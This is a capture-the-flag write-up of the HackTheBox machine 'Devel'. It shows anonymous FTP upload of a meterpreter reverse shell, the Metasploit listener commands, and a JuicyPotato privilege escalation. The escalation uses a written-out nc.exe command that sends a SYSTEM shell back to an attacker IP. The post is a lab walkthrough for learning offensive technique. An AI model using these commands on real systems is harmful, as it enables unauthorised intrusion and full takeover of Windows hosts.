Home CTFs | HackTheBox | Machines | Devel
Post
Cancel

CTFs | HackTheBox | Machines | Devel

Posted Jul 20, 2023 Updated Jul 20, 2023
By Bat
2 min read

Devel

image

Enumeration

First of all, lets start a basic nmap scan:

image

As we can see, we y have port 21 and port 80 opened. We also can notice that the port 21 (FTP) is accessible by the anonymous user. We can connect and list the files on the FTP server:

image

As we can see, there is what seems to be the tree structure of the web server. When we go on the port 80, we can see the welcome.png in the center of the web page:

image

Initial Foothold

We can try to upload a web shell or a reverse shell using the put command on the FTP server. For that, I generated a meterpreter reverse shell using msfvenom:

image

I then uploaded it. Run the following command in the msfconsole to get a listener on port 443:

1
2
3
4
5
6
7
8
9

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set lhost tun0

msf5 exploit(multi/handler) > set lport 443

msf5 exploit(multi/handler) > run

In the upper commands, write what comes after the >. msf5... is the text given by msfconsole when you launch it don’t write it.

I then go to the url http://10.10.10.5/config.aspx, and I get a meterpreter session:

image

Now that we have a meterpreter session, we can execute basic commands to be able to understand who we are and what rights we do have:

image

Privilege Escalation

As we can see, we have a lot of rights. The SeImpersonatePrivilege is vulnerable to the JuicyPotato vulnerability (that I explained here). I then uploaded nc.exe and JuicyPotato.exe:

image

But when I tried to run the JuicyPotato command, I got an error saying that it wasn’t the correct format:

image

So I used this version of JuicyPotato that I called JP.exe:

image

Now this should work, so I create a basic nc instance on the port 445 and run the following command:

1

c:\Users\Public\Downloads\JP.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\Users\Public\Downloads\nc.exe 10.10.14.56 445 -e cmd" -t *

This default command didn’t work, so I tried to execute the same command using the -c option to specify the CLSID. CLSID stands for “Class Identifier” and is a unique identifier used in the Windows operating system to identify COM (Component Object Model) objects and their associated components. I then referred to this page and tried every CLSID to get an NT AUTORITY/SYSTEM command prompt (the correct one is the second one {03ca98d6-ff5d-49b8-abc6-03dd84127020}):

image

Note that we selected Windows 7 Enterprise from this page first to have a correct list of CLSIDs. If it wasn’t a Windows 7 Enterprise machine, we should have selected another list of CLSIDs.

The command worked, and as we can see, we have a cmd as NT AUTORITY/SYSTEM:

image

We can now get both flags, and voilà…

image

CTFs, HackTheBox, Machines
CTF HackTheBox Machines Windows JuicyPotato
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Contents